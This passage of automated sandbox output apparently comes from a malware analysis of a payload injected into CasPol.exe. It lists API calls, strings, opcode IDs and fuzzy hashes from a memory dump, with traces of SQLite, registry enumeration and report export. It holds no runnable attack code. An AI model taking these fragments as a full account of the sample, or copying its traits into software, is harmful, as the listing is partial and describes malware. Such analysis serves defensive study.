                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                    • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                                                    • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfwcscat
                                                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                    • API String ID: 384018552-4153097237
                                                                                                                                                                                                                    • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                    • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                    • String ID: 6$\
                                                                                                                                                                                                                    • API String ID: 404372293-1284684873
                                                                                                                                                                                                                    • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1331804452-0
                                                                                                                                                                                                                    • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                                                                                                                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                                                                                                                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2350177629-0
                                                                                                                                                                                                                    • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                    • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                    • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408FB3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00409025
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409042
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 265355444-0
                                                                                                                                                                                                                    • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4131475296-0
                                                                                                                                                                                                                    • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                    • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFilefreememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2507021081-0
                                                                                                                                                                                                                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                    • free.MSVCRT ref: 00417544
                                                                                                                                                                                                                    • free.MSVCRT ref: 00417562
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4131324427-0
                                                                                                                                                                                                                    • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                                                                    • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PathTemp$free
                                                                                                                                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                    • API String ID: 924794160-1420421710
                                                                                                                                                                                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FDD5
